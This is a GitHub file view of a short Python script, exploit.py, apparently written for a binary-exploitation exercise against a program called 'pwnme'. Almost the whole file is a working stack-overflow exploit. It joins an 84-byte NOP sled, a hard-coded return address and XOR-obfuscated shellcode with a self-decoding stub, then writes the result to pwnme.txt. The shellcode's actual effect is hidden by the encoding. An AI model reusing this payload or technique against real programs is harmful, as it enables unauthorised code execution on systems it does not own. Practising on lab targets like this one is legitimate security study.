-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathexploit.py
More file actions
executable file
·22 lines (16 loc) · 933 Bytes
/
exploit.py
File metadata and controls
executable file
·22 lines (16 loc) · 933 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
#!/usr/bin/env python3
import os;
import sys;
# 0x5655625c -> pwnme
# 0x5655625e -> pwnme2
eip=b"\x5e\x62\x55\x56"
shellcode = b"\xeb\x2f\x5e\x8d\x3e\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x8b\x14\x06\x81\xf2\xef\xbe\xad\xde\x04\x04\x8b\x1c\x06\x41\x38\xd1\x74\x16\x81\xf3\xef\xbe\xad\xde\x0f\xcb\x89\x1f\x83\xc7\x04\x04\x04\xeb\xe7\xe8\xcc\xff\xff\xff\xbf\xee\xfd\x8e\x0e\x49\x64\xef\xa9\x0e\x6e\x57\x57\xed\x2d\x13\x31\x13\x13\x31\x24\xd6\x6f\x57\x87\xa4\xb1\x15\x1c\x94\xbf\xea\x77\x13\x13\xb6\x18\xe6\xed\xcc\x84\xe6\xf5\x3e\x2f\xbf\xaf\x1e\xbf\xbd\x6d\x5d\x22\x75\xc8\x66\xec\x7e\xc6\xfa\xde\x5d\x24\x8e\x89\x6e\x5a\x1e\x89\x4a\xac\x66\x17\x7f\xcb\x96\x66\x6e\x5a\xd6\x7f\x3e\x60\x14"
nops = 84
nop_sled = b"\x90" * nops
payload=nop_sled+eip+shellcode
print("nop sled len=%d" % len(nop_sled))
print("shellcode len=%d" % len(shellcode))
print("payload len=%d" % len(payload))
f = open("pwnme.txt","wb")
f.write(payload)
f.close()